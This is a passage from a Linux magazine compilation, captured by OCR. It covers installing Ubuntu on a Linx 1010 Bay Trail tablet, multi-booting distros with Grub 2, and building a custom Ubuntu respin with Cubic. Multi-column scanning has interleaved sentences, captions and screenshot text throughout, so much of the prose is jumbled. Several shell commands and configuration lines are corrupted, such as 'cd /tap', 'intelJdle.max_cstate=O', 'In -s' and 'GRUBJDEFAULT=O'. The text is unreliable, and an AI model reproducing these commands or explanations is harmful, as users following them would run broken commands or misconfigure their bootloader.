you manually leave all other options as they are before clicking 'OK'. Now Bluetooth, keyboard/trackpad and internal flash.
set up your select the remaining free space and click'+’ for a second Later versions of the kernel should improve compatibility
partitions when
time. This time, set 'Use as' to 'swap area' and click 'OK'. - this is why we were keen to see if we could install Ubuntu
prompted - you
Finally, click the 'Device for bootloader installation' dropdown 15.10 or 16.04 on the Linx. We were thwarted in this respect -
need to preserve
menu and select the Windows Boot Manager partition before touch support is present, but we had to manually add the
the original
EFI partition. clicking 'Install Now’. The rest of the installation process bootia32.efi file to the EFIXBoot folder to get the live
should proceed smoothly. Once it's finished, however, don't environment to boot, and installation failed at varying points,
click 'Continue testing or Reboot now just yet. First, there’s a probably due to the spotty internal flash drive support. We're
vital step you need to perform in order to make your copy of hoping the final release of 16.04 may yield more possibilities,
Ubuntu bootable, and that’s install a 32-bit version of the but if you can’t wait for that and are willing to run the risk of
Grub 2 bootloader. The step-by-step walkthrough (see reduced stability read on.
bottom right) reveals the simplest way to do this, courtesy of If you're desperate to get touchscreen support for your
Ian Morrison's handy script. tablet, and you’ve got a spare USB Wi-Fi adaptor handy
(because updating the kernel breaks the internal Wi-Fi
Hardware compatibility adaptor), then upgrade your kernel to 4.1 or later. We picked
Once you’ve installed Ubuntu and rebooted into it for the first kernel 4.3.3 - to install this, type the following into a Terminal:
time, you'll once again need to set the desktop orientation to $ cd /tap
landscape via Screen Display under System Settings. Now $ wget \kernel.ubuntu.com/~kernel-ppa/mainline/v4.3.3-wily/
open Firefox on your tablet and download two more scripts linux-headers-4.3.3-040303_4.3.3-040303.201512150130_all.
from http://bit.ly/z3735fpatch and http://bit.ly/z3735f- deb

Experimenting with Linux


The only other distro we were able to install successfully
on the Linx 1010 tablet was Debian Jessie (8.3). It's unique
in that both 32-bit and 64-bit versions work with 32-bit
UEFI without any modification, but there's no live support:
you'll have to install it direct to the hard drive.
Wi-Fi support isn't provided out of the box - we had to
add a non-free firmware package to the USB flash drive to
get our plug-in card recognised. Hardware support was
minimal, although upgrading to kernel 4.2 did at least
allow the internal Wi-Fi adaptor to be recognised.
Elsewhere we tried the Fedlet remix of Fedora
(http://brt.ly/fedora-fedlet) as a live USB, but had to
use a Windows tool (Rufus) to create the USB flash drive
in order for it to boot. Performance was extremely
sluggish, and the internal Wi-Fi adaptor wasn’t recognised.
Touch did work, however.
We also had success booting from a specialised Arch
Linux ISO that had SDIO Wi-Fi and 32-bit UEFI support.
You can get this from http:ZTbit.ly/arch-baytrail. but
stopped short of installing it. We also got a version of
Porteus up and running from http://build.porteus.org
with a lot of fiddling, but the effort involved yielded no > Setting the issues with the Wi-Fi adaptor aside, installing Debian was a
better results than anything else we tried. reasonably straightforward process on our Linx 1010 tablet.

106 | The Hacker's Manual


Ubuntu tablet

$ wget kernel.ubuntu.eom/~kernel-ppa/mainline/v4.3.3-wily/ xinput set-prop “Goodix Capacitive TouchScreen”


linux-headers-4.3.3-040303-gener ‘Coordinate Transformation Matrix’ 010-101001
ic_4.3.3-040303.201512150130_amd64.deb You should now find the touchscreen works correctly in
$ wget \kernel.ubuntu.com/~kernel-ppa/mainline/v4.3.3-wily/ horizontal landscape mode. As things stand, you'll need to Open Settings >
linux-image-4.3.3-040303-gener apply this manually every time you log into Ubuntu, while the Universal Access
ic_4.3.3-040303.201512150130J386.deb touchscreen won't work properly if you rotate back to portrait > Typing tab and
flick the'On Screen
$ sudo dpkg -i linux-headers-4.3*.deb linux-image-4.3*.deb mode. If you want to be able to rotate the screen and
Keyboard'switch to
Once complete, reboot your tablet. You'll discover you now touchscreen together, then adapt the rotate-screen.sh script On to have it start
have touch support at the login screen (this is single touch, at http://bit.ly/RotateScreen (switch to Raw view, then automatically with
not multi-touch), but once you log in and the display rotates right-click and choose ‘Save page as' to save it to your tablet). Ubuntu.Next,open
Onboard Settings
you’ll find it no longer works correctly. We'll fix that shortly. Then open it in Gedit or nano to amend the following lines:
via the dash and
First, you need to be aware of the drawbacks. You'll lose TOUCHPAD-pointer:SINO WEALTH USB Composite tick'Start Onboard
support for the internal SDIO wireless card (we had to plug in Device’ Hidden; plus tweak
a spare USB Wi-Fi adaptor to get internet connectivity back) TOUCHSCREEN- Goodix Capacitive TouchScreen’ the keyboard to
and the sound is no longer recognised. There may also be Save and exit, then use the script: your tastes. Now
you'll have easy
issues with stability that you can fix with a rough and ready $ ,/rotate_desktop.sh <option>
access to the touch
workaround by configuring Grub: Substitute <option> with normal (portrait), inverted, left keyboard via the
$ sudo nano /etc/default/grub or right to rotate both the screen and touchscreen matrix. status menu.
Look for the line marked GRUB_CMDLINE_LINUX_ Before using the script, you need to first undo the current
DEFAULT and change it to this: screen rotation using Screen Display - restore it to its default
GRUB_CMDLINE_LINUX_DEFAULT="intelJdle.max_ view, then run ,/rotate_desktop.sh right to get touchpad and
cstate=O quiet” touchscreen on the same page.
Save your file, exit nano and then type: From here we suggest creating a startup script:
$ sudo update-grub open dash and type startup , then launch Startup
Reboot, and you'll reduce the potential for system lockups, Applications. Click 'Add'. Type a suitable name etc to help
but note the kernel parameter increases power consumption you identify it, click 'Browse' to locate and your select your
and impact on battery life, which is a shame because the script - when done, click inside the 'Command' box and be
ACPI features still don't work, meaning that the power sure to append right to the end of the script. Click 'Save',
settings remain inaccurate: battery life is always rated at reboot and after logging in you should find your tablet and
100%, even when it's clearly not. touchscreen now work beautifully with your plug-in keyboard
and touchpad.
Fix the touchscreen You've now successfully installed Ubuntu on your Bay Trail
Moving on, let's get the touchscreen working properly. First, tablet. What next? Keep an eye out for the latest kernel
identify its type using xinput. In the case of the Linx 1010, updates and forums to see if entrepreneurial folk have found
this reveals it has a Goodix Capacitive TouchScreen. What we the workarounds and tweaks required to get more of your
need to do is instruct the touchscreen to rotate its matrix tablet’s hardware working properly. As for us, we’re off to see
when the display does, which means it'll work in both portrait if we can get the internal sound and Wi-Fi working again
and landscape modes. You can do this using xinput: before turning our attention to the ACPI settings... ■

Install 32-bit Grub bootloader


>ackaoe grub-eft-tk32-btn.
IS and directories currently installed.)
UJ2 btn_2.!2-betd! 9ubuntul.7_oftd64.dcb ...
!-bvl«2*9vbu(ilul.7) ...
grvb-tfVUJZ.
ta32 2.62-beto2-9ubuntul.7 andM.deb ...
:a2-9vbuntul.7) ...
*2-be:a2-9ubuntul.7) ...

No preview available :/grub with new version


■ eported.

• non-tero valve when C*UO_UIOOCN_TIMCOUT Is set Is no longer suppor

3.16.8-M-4dMfte
Unuxlum-J2btt-p«tch.*h Ing-J.16.6-68 generic
whkhiv shell script (1.9 K6) l.lftfi-dS-genertr .
from: https //doc-iO*4-do<s googlevsercontent com Ing-1.16.6-45-generic
.rnwa-e configuration
what should Firefox do with this fief
Open with gedit (default)
installation Ms f rushed. You can continue letting Ubuntu now, but until you
restart the computer, any changes you make or documents you save will not be
preserved

cononue lestmg | Kestert now ,J

D Download install script 0 Install script 0 Reboot PC


When Ubuntu has finished installing to your The linuxium-32bitpatch.sh file is a script You'll see a series of packages are
tablet, make sure the dialogue asking if you'd that automates the process of installing the downloaded and installed automatically,
like to continue retesting or restart your PC is 32-bit version of the Grub 2 bootloader. Now which will basically allow your tablet’s 32-bit
kept on-screen. Now open the Firefox browser you’ll need to press Ctrl+Alt+T and type the UEFI to recognise the Grub bootloader, and
and navigate to http://bit.ly/grub32bit, following commands: allow Ubuntu to load automatically at startup.
which will redirect to a Google Drive download $ cd Downloads Click the ‘Restart Now' button to complete
page. Click 'Download' to save the linuxium- $ chmod 700 linuxium-32bit-patch.sh the process and wait while your PC reboots
32bit-patch.sh to your Downloads folder. $ sudo ,/linuxium-32bit-patch.sh into Ubuntu proper for the first time.

The Hacker's Manual | 107


Hacking

MULTI-BOOTINGWITH
* GRUB t
Having plenty of choice allows you to be fickle,
so it’s time we show you how to have several
distros on your computer at once.
here are lots of Linux distributions Windows installed on the same computer and also look at how you can share things like your

T (distros) out there, each with their


own strengths and weaknesses.
When you want to try another one
you can usually get hold of a live version, or
choosing between them at boot time, but the
same can be done with two Linux distros.
Over the next few pages we will look at how
you can set up your computer to be able to
documents and photos between the various
distros you are running.

Grub 2 vs Grub legacy


install it in a virtual machine, for a quick boot from a choice of several operating Multi-booting Linux is made easier thanks to
test. Both of these are quick and easy but systems, one of which may be Windows, so the almost universal adoption of Grub2as the
are not the same thing as running an that you can have more than one Linux distro bootloader. There are two main versions of
installed distro directly. available at once. You could even extend the Grub available. The old version, that never
But perhaps you don't want to give up on information we give here to include one or quite reached 1.0, is often known as Grub
your exist ng distro or maybe you share a more of the BSD operating systems too. We'll legacy, while the newer Grub 2 is what is used
computer with your partner and by the vast majority of
you prefer Mint but they like
“Multi-booting Linux is made distros now. Grub 2 is very

I
Fedora - it would be great to have different from the old
both. So what are you to do? The easier thanks to the almost program, giving rise to a
term ‘dual booting' is usually used reputation for complexity. In
to refer to having a Linux distro and universal adoption of Grub 2.” fact, its modular approach

108 | The Hacker's Manual


Multi-booting

still be installed. If you are offered a choice for


Screenshot GParted Screen resolution Web Browser
the swap partition, pick the one from your
other distro, they can both use it.
When the installer has finished, reboot
your computer and you will see the boot menu
from the first distro, with Windows showing, if
appropriate, but no sign of your new distro.
That’s because you have left the Grub settings
untouched. One of the neat features of Grub 2
is its ability to generate its own configuration
files, so open a terminal and run:
$ sudo grub-mkconfig -o /boot/grub/grub.cfg
This will scan your hard drive for an OS and
create menu entries for each of them. Now
reboot and you should see both distros, and
maybe Windows, in your boot menu. Ubuntu
and its derivatives have a command called
update-grub , which is a one line shell script
that runs grub-mkconfig as above, use
tt>u are advised to backup your data before proceeding.
whichever you prefer. One advantage of not
X cancel | apply |
using the script is that you can preview the
menu with $ sudo grub-mkconfig I less to
/dev/zda ■ GParted see what would be picked up and written to
the menu. You need to understand 'Grubese'
> GParted is the easiest way to manage your partitions, making room for another distro.
to make sense of this.
means it can handle many more booting setup, if you already have it you can skip the
situation and is able to automatically preceding paragraph and go straight onto the Moving Grub
configure itself much of the time. We will only interesting part of adding extra Linux distros If your new installation didn't offer an option to
consider Grub 2 from here on, and simply to your setup. relocate Grub, you will probably get a boot
refer to it as Grub. menu with everything already in it, because it
There are three main parts to Grub. The Adding another distro ran grub-mkconfig as part of the process.
initial boot code is normally loaded into the Distro installers can repartition your drive with So why not let this happen every time? The
Master Boot Record (MBR) of the disk. This is varying degrees of success, so it's often best problem is with updates, when a distros
a small space, 446 bytes, so this code is to prepare your drive beforehand. The best package manager installs an update to the
minimal and just enough to load the second tool for this is GParted and, download the Linux kernel, it will re-enable that distros
part, which lives in your boot directory or latest release from its home at http:// version of Grub, so you'll find the menu
partition in a directory called grub. In here you gparted.org. Boot into GParted Live and switching from one distro to the other.
will find the various filesystem modules, along resize your existing root partition to a suitable To relocate Grub to a distros partition, first
with themes and fonts used if your distro has size. GParted will tell you how far you can go. boot into the distro you want to manage Grub
customised the boot menu’s appearance. but if possible make it at least 50% larger than and make sure it’s doing so with this terminal
You will also find the most important file for the space it currently needs. Don't create a command (assuming you are using the disk at
the purposes of this article: grub.cfg. This file partition in the space that's freed up. leave it /dev/sda): $ grub-install /dev/sda.
contains the menu definitions, which options unallocated then install your second distro in Then boot into the other distro and identify
appear in the boot menu and what happens the usual way, telling it to use the unallocated the partition holding your root filesystem with
when you select each one. space on the drive. The installation is done in $ findmnt / -o SOURCE , then tell Grub to
The first step is to get some operating the normal way with one exception, you don’t keep its bootloader there with $ grub-install
systems installed. If you want to include want to install Grub to the MBR. Most -force /dev/sdaN where sdaN is the device
Windows in your list of OSes, it should be installers have an option to choose the returned by findmnt. We need -force
installed first, which isn't usually an issue location for Grub, it may be hidden behind an
since it was probably on the computer already. Advanced Button. If this isn't possible, we will
Linux installers are good at identifying an show you how to move it later. Choose either
existing installation of Windows and working to install it to the root partition of the distro or
with it. Then install your preferred distro as not at all. This only affects the first part of the
normal. This will give you a standard dual boot Grub code, the files in boot and elsewhere will

One distro in control


The first distro you install should be considered unbootable - at least until you boot from a
your primary distro; this is the one that rescue disc to fix things. Other distros can be
controls booting, at least for now. Because of removed later with no more inconvenience with
that, you should never remove the primary a superfluous boot menu entry that goes > Some distros allow you to keep Grub out
distro or you could render your computer nowhere (until you run update-grub again). of the MBR when you install them, but they
may try to tell you this isn’t a good idea!

The Hacker's Manual | 109


Hacking
» because installing Grub to a partition is default (Grub counts from zero so the linux creates menu entries for the running
considered less than ideal these days, but all standard setting boots the first item). You can distro while 30_os-prober scans your hard
we really want to do here is keep it out of the also change the timeout with the line GRUB_ disk for other operating systems, Linux or
way. This means that when a kernel update TIMEOUT and the default kernel options in otherwise, and adds them to the menu.
appears forthat distro, your boot menu won't GRUBJJNUXDEFAULT . The file is The last one is the way one menu can contain
get messed up. In fact, it won't be touched at commented, explaining the options, or you all of your distros.
all. so you will need to boot into your primary can read the Grub info page for a more
distro and run grub-mkconfig or update-grub detailed listing of all the options. Chainloading
again to pick up the changes. The files in /etc/grub.d are shell scripts There is another way of handling multiple
that are run by grub-mkconfig . If you want to distros called ‘chainloading'. This is how Grub
Configuring Grub customise your boot menu, you can add your boots Windows because it can't boot Windows
Grub's ability to generate its own menu based own scripts, all they need to do is output valid itself. Instead, it passes control to the Windows
on the contents of your hard drive is one of its menu entries. The scripts in /etc/grub.d are bootloader, as if that had been loaded directly
killer features, but you can also configure how run in order, which is why their names start by the BIOS. We can use this to enable each
these menus are created. This uses the scripts with numbers. OO_header writes the standard distro to maintain its own boot menu and
in /etc/grub.d and the settings in /etc/ settings at the top of the menu file, while 1O_ choose one from the initial Grub menu.
default/grub. This file contains a number of That means you
variable definitions which you can change to need a way to create
alter the menu, eg Grub normally boots the
“Use chainloading to enable your own menu
first option if you do not select anything, find
the line that sets GRUBJDEFAULT=O and
change it to the number you want to be

GNU GRUB
I each distro to maintain its
own boot menu.”
version 2.02~beta2-%buntul.3
entries. You can't
simply add them to the
grub.cfgfile as that
will be overwritten the
next time grub-mkconfig is run, but there is a
file in /etc/grub.d called 40_custom that you
can use to add your own menu entries. Copy
this to a meaningful name, and possible
Advanced options for Linux Mint 17.3 Cinnamon 64-bit
change the number to include it earlier in the
Chainload openSUSE 42.1 menu. Edit this file and add valid menu entries
Chainload Manjaro 15.12
Chainload Fedora 23 to the bottom of this file. Don't touch the
existing content - although you can and
Memory test (memtest86+)
Memory test (memtest86+, serial console 115200) should read it. If you want to load the menu for
Windows 7 (loader) (on /dev/sdal)
openSUSE 42.1 (x86_64) (on /dev/sda7) OpenSUSE installed on /dev/sda7, provided
Advanced options for openSUSE 42.1 (x86_64) (on /dev/sda7) you installed Grub to sda7 or moved it as
Manjaro Linux (15.12) (on /dev/sdaS)
Advanced options for Manjaro Linux (15.12) (on /dev/sda8) above, add this to the file:
Fedora 23 (x86_64) (on /dev/sda9) menuentry “Load openSUSE boot menu” {
Advanced options for Fedora 23 (x86_64) (on /dev/sda9)
set root=(hd0,7)
System Rescue Cd 4.7.0
chainloader +1
}
Remember, Grub numbers disks from zero
but partitions from one, so sda7 becomes
hd0,8. This gives you the original boot menu

Use the T and I keys to select which entry is highlighted.


for each distro, and you don't need to reboot
Press enter to boot the selected OS, 'e' to edit the commands before booting or 'c' into the primary distro to update the boot
for a command-line.
The highlighted entry will be executed automatically in S89s.
menu, but it does mean that you have to make
two menu selections to boot any distro but
the main one. If you are using this method,
> Here we are, four distros, Windows and an option to boot from a rescue CD ISO image - you will see that you still have menu entries
all on the one boot menu with choices to visit the other distros’ individual boot menus. generated by grub-mkconfig . If you are not

Rescue systems
One of the neat features of Grub 2 is that it can custom and add the appropriate menu set root='(hdO,l)’
boot directly from an ISO image. Apart from definition. Here’s an example for System Rescue isofile=/Ubuntu/ubuntu-15.10-desktop-amd64.
allowing magazines to produce really nice multi­ CD (I always keep an ISO of that in boot): iso
boot cover discs, it also means you can have a set root='(hdO,l)’ loopback ioop $isofile
rescue or live CD always ready to boot. Not only menuentry “System Rescue CD 4.7.0” { menuentry “Ubuntu 15.10” {
is it faster than booting from an actual CD/DVD loopback loop /systemrescuecd-x86-4.7.0.iso linux (loop)/casper/vmlinu2.efi file=/
(or even a USB stick) but it saves all the time linux (loop)/isolinux/altker64 cdrom/preseed/ubuntu.seed boot=casper iso-
scrabbling though the stuff on your desk to find rootpass=something setkmap=uk scan/filename=$isofile quiet splash —
the right CD. isoloop=systemrescuecd-x86-4.7.0.iso initrd (loop)/casper/initrd.lz
This requires that the distro supports booting initrd iloop)/isolinux/initram.igz }
from an ISO. Most do. although the syntax can } Note the use of a variable, isofile , both
vary. All you need to do is create a copy of 4O_ and here is one for an Ubuntu live CD image methods work but this one is easier to maintain.

110 | The Hacker's Manual


Multi-booting
using Windows, you can prevent these menu
entries by using the following setting in /etc/
default/grub:
GRUB_DISABLE_OS_PROBER=true
As the os-prober function also adds
Windows, you cannot do this if you want to be
able to boot Windows, so either rename the
file containing the chainloader entries to have
those entries appear before the others,
something like 20_chainload or copy the
windows entry from your existing grub.cfg to
your chainload file then disable os-prober.

Sharing space
So we have several distros that are co-existing
in harmony, but what about our data? Do we
really need a separate home directory for
each distro? The short answer to that is yes.
While we could have a separate filesystem for You may find your installer allows you to use less than all of the available space for your
home and share the same user name and installation, saving the trouble of resizing in GParted later on.
home directory, this is likely to cause conflicts. To do this we need to go back to GParted and so on. Now when you save a file in
Programs store their configuration files in your and resize your partitions to make space to Documents, it will actually go to /mnt/
home directory, and if two of your distros have create a large partition for your data. Then common/Documents and be available to all
different versions of the same program you edit /etc/fstab on each distro to mount this your distros. Note: This assumes you are the
could have problems. Most software will filesystem at boot time. Incidentally, it is only user of the computer.
happily read the settings from an older version worth adding fstab entries to mount your
and update them, but then when you switch other distros in each one, say at Who owns what?
back to the distro with the older version, it /mnt/distroname - it makes things like this Now we have to tackle the thorny issue of file
could break. easier as you can do all the work in one distro. permissions and ownership. The first thing to
One solution is to have a separate It also makes accessing files from other do is make sure that the directories in
filesystem for your data files, these are what distros simple. So have this new filesystem /mnt/common have the correct owners with:
take up the space and are the files that you mount at. say, /mnt/common and create a $ sudo chown -R username: /mnt/common/
want available to all distros. This can be an directory in it for each user. Then you can user
entirely separate filesystem, but it could also create symbolic links to here in your other You may expect this to work for all your
be your home directory in your primary distro, distros, for example: distros if you created a user with the same
just remember that in this case you will have a $ In -s /mnt/common/user/Documents /home/ name in each of them, but it may not. This is
lot of file shuffling to do before you can user/Documents because Linux filesystems don't care about
consider deleting that distro should it fall out $ In -s /mnt/common/user/Music /home/user/ usernames but rather those users' numerical
of favour with you. Music user IDs (UIDs). Most distros give the first user
a UID of 1000, but a couple still start at 500,
*fstab (/etc) - gedit _ + x so check your UID in each distro with the id
File Edit View Search Tools Documents Help command, just run it in a terminal with no
£! Open ▼ □= Save @ r* Undo ' iD 6 Q, arguments. If they all match then great,
otherwise you will need to change any non­
1.-1 *fscab *
matching UIDs by editing /etc/passwd. Never
# Use 'blkid1 to print the universally unique identifier for a edit this file directly, a mistake could prevent
# device; this may be used with UUID= as a more robust way to name devices
anyone logging in, use the vipwcommand
# that works even if disks are added and removed. See fstab(5).
# instead $ sudo vipw.
# <file system> <mount point> <type> <options> <dump> <pass> Find the line for your user, which will look
# I was on /dev/sda5 during installation something like this
UUID=5743aec8-5642-4fbe-8a0f-c547218372db / ext4 user:x:500:100::/home/user:/bin/bash
errors=remount-ro 0 1
The first number is the UID. Change it to
# swap was on /dev/sda6 during installation
UUID=be7af5ae-c75f-457f-b22a-b7ddf9e00554 none Swap match the other distros and save the file. Next,
sw 0 0 need to change all files owned by the old UID
/dev/fd0 /media/floppyO auto rw,user,noauto,exec,utf8 0 0 to the new one. As everything in your home
directory should be owned by you, you can
/dev/sdab /mnt/common ext4 noatime 0 0
/dev/sda7 /mnt/opensuse ext4 noatime 0 0
take the brute force approach and chown
/dev/sda8 /mnt/manjaro ext4 noatime 0 0 everything in there
/dev/sda9 ZmntZfedora ext4 noatime 0 0 $cd
/dev/sdal ZmntZwindows ntfs defaults) 0 0 $ sudo chown -R username:.
Now you can switch between distros any
Plain Tert ▼ Tab Width: 8 T tn 18. Col 49 INS
r *»)) 0 12:13 Q1|
time you reboot, with each distro running
Menu M 0Terminal fpfstab (/etc)-gedit 1 /
natively and at full speed, and all with access
> For easier management add entries to /etc/fstab to mount your distros* root partitions. to all of your data. ■

The Hacker's Manual | 111


Hacking

How to build your


very own custom
Ubuntu distro
Why settle for what the existing distributions have to offer? Michael Reed
looks at Cubic, a tool for creating your own custom respin based on Ubuntu.

art of the beauty of Linux is the freedom of

P deployment that distributions offer, but when


installing it for yourself or others you’ll want to change
things. So, why not make your own version, or 'respin'? That’s
what a tool called Cubic is for, and we're going to look at how
file Edit View Bookmarks Go Tools Help

» C * O O

Places

■ D«
|/home/mike

you use it to modify the standard Ubuntu installation ISO and ClRut
bend it to your will in terms of content and aesthetics. 1 Documents

As for the difficulty? If you can install packages J Music


J Pictures
from the command line and boot from an ISO in a virtual J. Videos
Michael Reed
has been respinning machine, you should find it easy to get started with Cubic | Downloads

Linux for so long as the defaults were always usable in our experience. We’ll
that he spins it like a start with the simplest example of
record, right 'ound,
just adding some new packages and rebuilding the
baby. Right round,
ISO. This modified ISO can be used as an installer or
round, round.
as a live desktop environment. > We added the LXDE desktop to a standard Ubuntu
Once that's working, we'll show you how to customise it installation ISO. We also added a custom default
further by making LXDE the default desktop environment, backdrop for all new users.
customising that environment and adding some PPAs so privileges, unlike some tools of this sort.
that it really does feel like The first page of the Cubic user interface enables you
its your own personal spin on how Linux should look to specify the project directory. Cubic doesn’t run any tests
and work. for free space itself, and you'll need quite a lot of space for
the uncompressed ISO. The Ubuntu Desktop installation
Install Cubic ISO may weigh in at around 2.7GB, but its actual content is
Cubic expects to run under Ubuntu or Linux Mint about double that as it’s compressed using Squashfs. We’d
or one of their derivatives. If you are running a different recommend having at least 20GB free before you begin
distribution, you can still use Cubic and follow this tutorial using Cubic.
by running Ubuntu in a VM. Begin by installing from PPA. To The decompressing and recompressing of an ISO is
do this, locate the Cubic page on Launchpad (https:// rather time-consuming and an SSD works faster than
When you modify launchpad.net/cubic) and follow the instructions by a mechanical hard drive for this task. One way of speeding
an Ubuntu cutting and pasting the needed commands from that page, things up is to leave the project directory intact between
distribution that
sudo apt-add-repository ppa:cubic-wizard/release different build attempts.
makes use of a live
CD environment,
adds the repository to your system, sudo apt update This way. the decompression stage of the process only
using Cubic you're updates the system so that it can see contents of the Cubic has to be carried out once, and you keep the changes
also modifying the PPA. sudo apt install -no-install-recommends cubic mn you've already made. Delete the folder and start again if you
live environment. adds Cubic itself. Other than that, the installation should want a true fresh start at modifying
This means that
then take care of itself in terms the ISO.
Cubic is perfect for
making a bootable of dependencies. Having specified the working directory for the project,
ISO with some extra The next step is to obtain an up-to-date Ubuntu press Next to proceed to the next page, the Project page.
tools on it. All you installation ISO to work with. We’ll use Ubuntu 21.04, Click the icon next to the filename field and specify the
need to do is select
but 20.04 LTS (Long Term Service) is a good choice as well. base ISO that you plan to use as your starting point for
Try Ubuntu when it
Launch Cubic in the normal way that you launch GUI apps customisations. Once you’ve done that, most of the fields
startsup.
or load it in a terminal window for extra progress on this page will be filled in automatically, but you can safely
information. When running, Cubic requires no super-user change things like
Build your own custom Ubuntu distro

the release name and the name of the output ISO.


Click next to move on to the Extract page. You don't have
to do anything on this page, but be warned that it might be
There are a lot of
a good time for a quick tea break, as extraction can take a
Linux utilities for
few minutes. Once this is complete, you can open the same remixing an existing
directory again in the future. Once you've extracted the files distribution floating
from the ISO. you can quit the application at any time as about, but we found
long as you don't interrupt an operation that is in process, that most of them
aren't maintained!
and this means that you don't have to complete the
This means that
customisation in a single session with the program. they only work
properly with
The Terminal page distributions that
are now out of date.
Without doing anything else, you'll be moved onto the next
Even if they seem
page, the Terminal page, and this is where we'll be spending to work, chances
a lot of our time. Cubic employs some Linux wizardry (a are they'll fall over
chroot terminal) to give you a virtual terminal that operates halfway through the
on the filesystem that will process or
> Our idea of an appropriate Linux startup screen. what they produce
later be rolled into an installation ISO. Check out the Plymouth themes at www.gnome- won't work
In general, most customisations that you can carry out look.org or modify/create your own (see https:Z< properly.linuxium.
from the command line on a running Linux system can be wiki.ubuntu.com/Plymouth). com.au.
done from here, and you can use familiar tools, such as apt.
to carry them out. More advanced customisation can get Krita rather than GIMP for this example, but we didn't
quite technical, but on the positive side, there is practically because the Krita package pulls in quite a lot of KDE
no limit to the changes you can make. Note that we can cut resources, and we're trying to keep this example fairly slim.
and paste commands into the window. There is also a copy What we've done so far is a fairly minor change to the
icon at the top of this window, and this allows you to copy installation ISO, and we'll eventually do things like adding
files and folders into the currently selected directory. PPA repositories and changing the desktop environment,
Before we attempt to add packages to the system, we'll but for now. we’ll leave it at that.
start by adding the Universe and Multiverse repositories
and update the system. Optimise packages
add-apt-repository universe Clicking Next again takes us to another screen (after Cubic
add-apt-repository multiverse has carried out a bit more preparatory work) and this page
Notice that we omit the sudo command as we're allows you to remove packages from the final installation.
effectively the root user already, but show some care as you This means that you can have packages that are on the live
could accidently wreak havoc on this virtual system as we ISO, but are not part of the actual installation. Make
can affect any files we like within it. If we run apt upgrade , alterations in this section with care, and don't remove
the entire system will be updated to the current version of anything unless you’re absolutely sure that the system
each package. This doesn't increase the size of the eventual doesn't need it.
ISO by much because you’re only replacing outdated As is true at all stages of customisation, you can move
packages with newer versions. backwards and forwards through the pages of the Cubic
GIMP and Inkscape are two highly useful graphics interface without losing the virtual filesystem that contains
programs, and we'll add them both by typing apt install your modifications.
gimp inkscape . When you use apt in this way, before you Clicking Next takes you to a page where you can select
confirm that you want to go through with the installation, between three tabs. 'Kernel' allows you to choose the kernel
apt will give you an estimate of how much space will be that will be installed. This is the kernel that the installer
used up; although, it is impossible to say precisely how boots to rather than the kernel that is eventually installed to
much size this will add to your finished installation ISO as your hard disk. Occasionally, the stock kernel on a standard
the filesystem will be compressed. We could have used ISO won't work because of incompatibilities with your

Cubic Documentation
The documentation for Cubic is rather limited as Cubic is quite a well-known program and it's
0 Cubic
it's concentrated on the Launchpad page for the been around for a number of years, so web Overview Code Bugs Blueprints Translations

project. The two areas that provide the most searches tend to be fruitful. For example,
Questions for Cubic
information are the Answers and FAQs sections. searching on askubuntu.com produces a lot of
by relevancy ■ Search
The Answers section shows a good (but not useful information. However, check the age of Languages fitter (Change your preferred languages)
o English (en)
massive) level of activity and it helps that it's posts as they stretch back quite a long way and Status
oOpen a Needs information o Answered o Solved Expired invalid
searchable too. The main Cubic developer might not be applicable to the version of Ubuntu
Summary Created Sob
is highly active on this forum-like section of the that you are using. A few YouTube videos covering • 698512 Cannot bot ISO FMe generated with Cubk 2021 -08-25 1 Je
Launchpad page, often offering highly detailed the basics exist. We feel that a lack of plentiful, 2021.06-52-

answers. This means that the information is there, traditional documentation is probably the weakest > Asking around on the Launchpad is
but it's quite a lotof work to search for it. point of the overall Cubic experience. probably your best bet for answers.

The Hacker's Manual | 113


Hacking
hardware, but an older or newer kernel will work. Install the What you should be presented with is a standard
kernel you want to work with on the Terminal page ( apt Ubuntu installation, but it will install the extras that we have
install <name of kernel>) and then select it here if the latest added (GIMP and Inkscape in this example). If you choose
As we were using one causes any problems. 'Test Ubuntu’ rather than ‘Install Ubuntu’, you can use the
Cubic, we noticed ‘Preseed' allows you to alter software choices during live environment, and it too will contain the extra packages
that the following installation. See the Debian Wiki (https://wiki.debian.org/ that we've added. If you select 'minimal installation’ in the
error kept popping
Debianlnstaller/Preseed) for a full guide to what Ubuntu installer options, our changes will always be added,
up: “Error while
dialing dial unix/
preseeding is capable of and how it works. 'Boot' has but the installation process will go faster and less cruft will
run/zsysd.sock: options that mostly relate to the GRUB bootloader. In this be added to the installation.
connect: no such example, we won’t alter anything in the sections on this Once the installation has completed, assuming
file or directory" page. The next page allows you to alter the compression everything has worked as it should, you should be able to
However, the
scheme used by Squashfs, and we’ll leave this as is too. boot into Ubuntu Linux and test it out.
developer himself
mentioned on the Having gone through a test installation, we've only
forum that the Generate the ISO scratched the surface of what you can do with Cubic. Here
error can The next page is the Generate page, and as soon as we go are some further refinements and ideas to personalise the
be ignored.
to this page, Cubic will start the work of building the installation. To make the additions, you can open the Cubic
installable system. In the interests of testing the system working directory that you used before. This saves time and
with a simple example, we’d recommend allowing this keeps the changes we made in terms of updating the
process to complete if you're new to using Cubic. package system.
Compressing the filesystem and building the ISO is quite a
lengthy process, and usually takes several minutes or Desktop environments
more, while giving your CPU and memory quite a workout. We can add the LXDE desktop environment and the
Linux always seems to use up a lot of memory when LightDM login manager by typing apt install Ixde lightdm
dealing with either large files, lots of files, or both; so on the terminal page. When you do this, you should see a
consider shutting down unneeded applications at this text mode dialogue that gives you the option of choosing
point, unless you have a lot of system memory to spare. your default login manager. Choose LightDM. We now have
Things were a bit cramped on the 8GB machine we used for to edit a text file to make LXDE the default desktop
testing If everything goes according to plan, the end result environment for new users. Within the Cubic chroot
will be an ISO. Load the ISO into a virtual machine to terminal type nano /usr/share/lightdm/lightdm.
complete the test. conf.d/50-ubuntu.conf . Apologies for the long filename
there; it's not so bad if you use Tab completion to get to it.
In this file, change the part after the user-session= to read
LXDE rather than whatever is already in there. This means
that you will now automatically log into LXDE. and in
addition, LXDE will be the desktop environment of the live
ISO, if you choose ’Try Ubuntu' rather than 'Install Ubuntu’.
It's possible to mass-copy installed packages from an
already installed system using an old apt trick. Type
dpkg -get-selections > packageJisttxt on a running setup
The chroot to gather a list of all packages installed on the system. You
terminal of Cubic. can then apply this list within the chroot terminal of Cubic
You’ll probably by typing:
spend most of dpkg -set-selections < packagelist.txt
your time here,
apt-get dselect-upgiade
as this is where
You can also use this technique to 'save' the package list
you can add
of a system that you ve customised in Cubic by typing that
extra packages
and make other first command into the chroot terminal of the installation.
modifications. Of course, you can prune this list by hand in a text editor,

Living in a Virtual Machine


